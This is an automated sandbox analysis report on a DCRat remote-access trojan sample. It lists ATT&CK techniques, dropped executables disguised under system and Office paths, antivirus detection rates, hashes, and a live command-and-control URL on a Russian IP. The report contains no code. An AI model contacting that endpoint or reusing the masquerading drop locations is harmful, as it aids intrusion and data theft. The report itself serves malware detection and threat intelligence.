                                  Source: Yara match File source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: o9jDrpZrgR.exe PID: 4308, type: MEMORYSTR
                                  Source: Yara match File source: Process Memory Space: BlockrefBrokerperf.exe PID: 5520, type: MEMORYSTR
                                  Source: Yara match File source: Process Memory Space: qBJICEqiLNwXNBLrN.exe PID: 6604, type: MEMORYSTR
                                  Source: Yara match File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara match File source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, type: DROPPED
                                  Source: Yara match File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara match File source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, type: DROPPED
                                  Source: Yara match File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara match File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                                  Execution: 141 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 11 Scripting; 1 Native API; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                                  Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                                  Privilege Escalation: 12 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                                  Defense Evasion: 13 Masquerading; 1 Disable or Modify Tools; 241 Virtualization/Sandbox Evasion; 12 Process Injection; 11 Deobfuscate/Decode Files or Information; 11 Scripting; 31 Obfuscated Files or Information; 11 Software Packing; 1 DLL Side-Loading
                                  Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                                  Discovery: 1 System Time Discovery; 361 Security Software Discovery; 2 Process Discovery; 241 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; 3 File and Directory Discovery; 157 System Information Discovery
                                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                                  Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                                  Command and Control: 1 Encrypted Channel; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                                  Network Effects: Exploit SS7 to Redirect Phone Calls/SMS; SIM Card Swap
                                  Remote Service Effects: Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  [Behavior graph omitted. Behavior Graph ID: 1345582, Sample: o9jDrpZrgR.exe, Startdate: 21/11/2023, Architecture: WINDOWS, Score: 100]

                                  Source | Detection | Scanner | Label
                                  o9jDrpZrgR.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
                                  o9jDrpZrgR.exe | 69% | Virustotal |
                                  o9jDrpZrgR.exe | 100% | Avira | VBS/Runner.VPG
                                  o9jDrpZrgR.exe | 100% | Joe Sandbox ML |
                                  Source | Detection | Scanner | Label
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Users\user\Desktop\KWPomPtF.log | 100% | Avira | HEUR/AGEN.1300079
                                  C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Users\user\Desktop\BnwYCmoX.log | 100% | Avira | HEUR/AGEN.1300079
                                  C:\Users\user\Desktop\HJnNqbKj.log | 100% | Avira | HEUR/AGEN.1300079
                                  C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat | 100% | Avira | BAT/Runner.IK
                                  C:\Users\user\Desktop\MTqwIPIz.log | 100% | Avira | HEUR/AGEN.1300079
                                  C:\Users\user\Desktop\qtmQsFEO.log | 100% | Avira | HEUR/AGEN.1300079
                                  C:\Users\user\Desktop\pwLIWFpU.log | 100% | Avira | HEUR/AGEN.1300079
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\fNssmckm.log | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\jTkAEhsC.log | 100% | Joe Sandbox ML |
                                  C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\GbOXfjDL.log | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\GVjFENOl.log | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\lGVRPIpa.log | 100% | Joe Sandbox ML |
                                  C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Dcrat
                                  C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe | 69% | Virustotal |
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Dcrat
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe | 69% | Virustotal |
                                  C:\Recovery\qBJICEqiLNwXNBLrN.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Dcrat
                                  C:\Recovery\qBJICEqiLNwXNBLrN.exe | 69% | Virustotal |
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Dcrat
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe | 69% | Virustotal |
                                  C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Dcrat
                                  C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe | 69% | Virustotal |
                                  C:\Users\user\Desktop\BfMGYDNR.log | 3% | ReversingLabs |
                                  C:\Users\user\Desktop\BfMGYDNR.log | 4% | Virustotal |
                                  C:\Users\user\Desktop\BhRGcQzx.log | 5% | ReversingLabs |
                                  C:\Users\user\Desktop\BhRGcQzx.log | 9% | Virustotal |
                                  C:\Users\user\Desktop\BnwYCmoX.log | 8% | ReversingLabs |
                                  C:\Users\user\Desktop\BnwYCmoX.log | 13% | Virustotal |
                                  C:\Users\user\Desktop\ESwXjeKp.log | 5% | ReversingLabs |
                                  C:\Users\user\Desktop\ESwXjeKp.log | 4% | Virustotal |
                                  C:\Users\user\Desktop\GVjFENOl.log | 5% | ReversingLabs |
                                  C:\Users\user\Desktop\GVjFENOl.log | 7% | Virustotal |
                                  C:\Users\user\Desktop\GbOXfjDL.log | 5% | ReversingLabs |
                                  C:\Users\user\Desktop\GbOXfjDL.log | 7% | Virustotal |
                                  C:\Users\user\Desktop\HJnNqbKj.log | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\HJnNqbKj.log | 33% | Virustotal |
                                  C:\Users\user\Desktop\KWPomPtF.log | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\KWPomPtF.log | 33% | Virustotal |
                                  C:\Users\user\Desktop\MTqwIPIz.log | 5% | ReversingLabs |
                                  C:\Users\user\Desktop\MTqwIPIz.log | 4% | Virustotal |
                                  C:\Users\user\Desktop\NBQmTGPX.log | 3% | ReversingLabs |
                                  C:\Users\user\Desktop\NBQmTGPX.log | 4% | Virustotal |
                                  C:\Users\user\Desktop\QJNvoZJT.log | 3% | ReversingLabs |
                                  C:\Users\user\Desktop\QJNvoZJT.log | 4% | Virustotal |
                                  C:\Users\user\Desktop\SoilvDeL.log | 17% | ReversingLabs |
                                  C:\Users\user\Desktop\SoilvDeL.log | 9% | Virustotal |
                                  C:\Users\user\Desktop\XieCzWia.log | 5% | ReversingLabs |
                                  C:\Users\user\Desktop\XieCzWia.log | 4% | Virustotal |
                                  No Antivirus matches
                                  No Antivirus matches
                                  Source | Detection | Scanner | Label
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php | 0% | Avira URL Cloud | safe
                                  http://77.91.1H | 0% | Avira URL Cloud | safe
                                  http://77.91.124.101 | 0% | Avira URL Cloud | safe
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr | 0% | Avira URL Cloud | safe
                                  http://77.91.124.101 | 1% | Virustotal |
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php | 0% | Virustotal |
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr | 1% | Virustotal |
                                  No contacted domains info
                                  Name | Malicious | Antivirus Detection | Reputation
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
                                  Name | Source | Malicious | Antivirus Detection | Reputation
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr | qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
                                  http://77.91.1H | qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
                                  http://77.91.124.101 | qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | BlockrefBrokerperf.exe, 00000005.00000002.2209540037.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                    77.91.124.101 | unknown | Russian Federation | 64419 | ECOTEL-ASRU | true
                                    Joe Sandbox Version:38.0.0 Ammolite
                                    Analysis ID:1345582
                                    Start date and time:2023-11-21 04:46:04 +01:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 7m 23s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample file name:o9jDrpZrgR.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:c256204deb01c77e21ba17b5e2411245.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@18/43@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    Time | Type | Description
                                    04:47:25 | API Interceptor | 773171x Sleep call for process: qBJICEqiLNwXNBLrN.exe modified
                                    No context
                                    No context
                                    Match: ECOTEL-ASRU
                                    Associated Sample Name / URL | Detection | Threat Name | Context
                                    yyoCffXuAe.exe | malicious | DanaBot, RedLine | 77.91.124.149
                                    https://www.google.com/url?q=http%3A%2F%2Fe-stata.ru%2Ftrack%2F3%2Fsource%2Fcampaign-ads%2F%23fyubmg&sa=D&sntz=1&usg=AOvVaw39clRPZwVf2QrSL7oQz10Y | malicious | GRQ Scam | 77.91.124.119
                                    http://payoutninja-2102318.haighhouse.com/on?930 | malicious | GRQ Scam | 77.91.124.119
                                    https://get-bitcoin-pro.com/ | malicious | Unknown | 77.91.124.119
                                    https://telegra.ph/To-go-to-the-site-follow-the-personal-link-in-the-description-5ns636269-11-01 | malicious | GRQ Scam | 77.91.124.119
                                    file.exe | malicious | Stealc, Vidar | 77.91.124.154
                                    http://url6724.benefity.sodexo.cz/ls/click?upn=QUhkirpB2TftQx8ZqYfR-2B-2F9b4b10DgDKa9hu1GeKwPVEh7d16IedBzYTffXpEBwERJ115yo-2FbYaFzr-2Fk8kG7CqeAFMoC9-2FWya374fNcODga5kLATGmidRFDcLx0mY8lYX-2FsUpUV71fivljHxcp5hyrg10CivKkrEwWTkJu6fyyk-3DtJBe_XJwWT5SpCU-2FA9typ-2F76-2FKVTtVvwzo6vvOS4M1YJtZYM5BLWusGGW-2BF7rV-2BFDmod7khpmfPZQq-2BtpRe1PzAdI1uNKNhLQ81dPCzL4HfHG8u177lUVhQ4O4nG9ktQpsA5yCPf7DQaYR0p5iuR3HRC5EuSIYPRyvEnCIhKT7OrSnIEInq4fhjLOnR1Oqz-2FEkF3ySrQgqgjXeW7sIvxBe05yOQ-3D-3D | malicious | GRQ Scam | 77.91.124.119
                                    WEXTRACT.EXE.exe | malicious | Mystic Stealer, RedLine | 77.91.124.86
                                    file.exe | malicious | Stealc, Vidar | 77.91.124.154
                                    AXccSFenHt.exe | malicious | RedLine | 77.91.124.55
                                    hx8q0a4Hkn.exe | malicious | RedLine | 77.91.124.86
                                    2cdiEkh0Sx.exe | malicious | RedLine | 77.91.124.86
                                    1TMleppij0.exe | malicious | RedLine | 77.91.124.82
                                    file64b.exe | malicious | RedLine | 77.91.124.86
                                    boostfps.exe | malicious | RedLine | 77.91.124.86
                                    Epaulement.exe | malicious | RedLine | 77.91.124.86
                                    70141CDE965558529B1ADC82862D402149F21443F12F0.exe | malicious | Amadey, Glupteba, Mystic Stealer, RedLine, SmokeLoader | 77.91.124.86
                                    6eiKgvOR9U.exe | malicious | Amadey, Glupteba, Mystic Stealer, RedLine, SmokeLoader | 77.91.124.86
                                    O3l8L3C1HI.exe | malicious | Amadey, Mystic Stealer, RedLine, SmokeLoader | 77.91.124.1
                                    LeO8ZInM75.exe | malicious | Amadey, Mystic Stealer, RedLine, SmokeLoader | 77.91.124.1
                                    No context
                                    Match: C:\Users\user\Desktop\BfMGYDNR.log
                                    Associated Sample Name / URL | Detection | Threat Name
                                    LabyMod.exe | malicious | DCRat, zgRAT
                                    jWPW3CjSsa.exe | malicious | DCRat, zgRAT
                                    6v2t5igkn8.exe | malicious | DCRat, zgRAT
                                    file.exe | malicious | DCRat
                                    68ebff4655ce8e3641602b31a0f12adcd4f5d0813604655a309fd881.exe | malicious | DCRat
                                    Sentares_Hack_#U2014_#U043a#U043e#U043f#U0438#U044f.exe | malicious | DCRat
                                    LYOTMT26Vl.exe | malicious | DCRat
                                    4J576dHwVU.exe | malicious | DCRat
                                    sw9ofrTPS0.exe | malicious | DCRat
                                    jHednJXHgj.exe | malicious | DCRat
                                    file.exe | malicious | DCRat
                                    file.exe | malicious | DCRat
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with very long lines (881), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):881
                                                            Entropy (8bit):5.900735913753077
                                                            Encrypted:false
                                                            SSDEEP:24:1Y3GTX7pFBlH/ymgRYcqN4mYuRQK2abdfWuGyIsNNCqQO:gYX7pzx/ymbcA4mYu2gVIiNjQO
                                                            MD5:4F233A8A5363F76698236D8D400523EA
                                                            SHA1:20459ED2838E9837554FFDDDF55E5D32566BBCA1
                                                            SHA-256:D43404ABB9FD6937DA29D4D857D8433364F51785C95F4CF885C9591FFEADB756
                                                            SHA-512:9469301FCF4BDC6D9B5A6808E83A9C45D6AD930C8D47925A5FBC5189FBE427B0E5E0F0381B66DB7370E54E6DB24086B684BD42CE238CEF0917FC23CF91EC3AD8
                                                            Malicious:false
                                                            Reputation:low
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                            • Antivirus: Virustotal, Detection: 69%, Browse
                                                            Reputation:low
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with very long lines (819), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):819
                                                            Entropy (8bit):5.889288515938023
                                                            Encrypted:false
                                                            SSDEEP:12:MTMEng4c8lklC6j5qLCumELxLYwwCcbuUTwjmCT1ERlcIxP1AUzmKA0Qm6L2n:MTMEnnRilCFmuswrcbNEXSxOq0k
                                                            MD5:0E2911B74AD30D7652057A3D560EFDF7
                                                            SHA1:C7BF5BCED785DF074368FD3ED6BB7DE4223690BD
                                                            SHA-256:2E33E968A2F0DE4FC38500DBCDD4747AF4E667C833FDB95F1F530FF0756B5A9E
                                                            SHA-512:1BBB04D5845818B0A7448287F6AF93A22CA12E23F4D7677F47DEF30B8776354B7E65FA55DF799D8026AE572431A9813103BD254189A0F24C25103B44AF5427B1
                                                            Malicious:false
                                                            Reputation:low
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                            • Antivirus: Virustotal, Detection: 69%, Browse
                                                            Reputation:low
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):197
                                                            Entropy (8bit):5.756222698628844
                                                            Encrypted:false
                                                            SSDEEP:3:cCaa2dMZfGVF0Cdw7zHYQ/EgWSX8FqmRCdxueUuA8auSt+W8NXeSwNaIIiV:cCH2dMZ+P0CS7zd/aSX8Fq7f4d+B68s
                                                            MD5:974B7B5B42C993287DCD9E02BA92818D
                                                            SHA1:EE7B2358B923567506F7E335AB2572E913EACAED
                                                            SHA-256:0539870B91D0C77D2CDCB496A0455B1B59521321ACF4F4AACF61E4143C5BCF10
                                                            SHA-512:41159AC082C7793421FC4833347517B614268B7A7551DF59B11F44D1F5F7DD1452B6E4C4B5CF090192CC156B88275185E6CE7AAA5BDDF84B8479EFA22B8F40D9
                                                            Malicious:false
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                            • Antivirus: Virustotal, Detection: 69%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):1698
                                                            Entropy (8bit):5.367720686892084
                                                            Encrypted:false
                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                            MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                            SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                            SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                            SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with very long lines (696), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):696
                                                            Entropy (8bit):5.900633508358525
                                                            Encrypted:false
                                                            SSDEEP:12:HpxwWUaiD2/KsY8o6JdxGez9emf0uYW9n2am0X6UWsjCWgrL5Ey3RUIKj:HgWUnjEoEdx/omfY30XHWUCzrLyaUhj
                                                            MD5:0505E50AA718C382870B6A9524387898
                                                            SHA1:C0B6D8D00202CA1155F308BA95F96EA5FD85BF14
                                                            SHA-256:763A0C28A91061B82C96A962DBB44E7163C64FDB6886C7ED4594FF013A510571
                                                            SHA-512:57FD122CA2990180BC422C8C5080C833334BA7835F8D680FC18E9B810E778AB21B796F02AFDFEB7A36FE8451748B1E3FA3901A7A6C3C86EB1E69CB6ECC63265C
                                                            Malicious:false
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                            • Antivirus: Virustotal, Detection: 69%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):175
                                                            Entropy (8bit):5.175572355642595
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1U9lEwYAfNHyBktKcKZG1Ukh4E2J5xAI+p4H:hCRLuVFOOr+DE1olSKOZG1923f+pK
                                                            MD5:4B484B4B5F2B9A6B45CFF925090291EF
                                                            SHA1:478A28087A025849F722EA237FD19C5D3E6B4F78
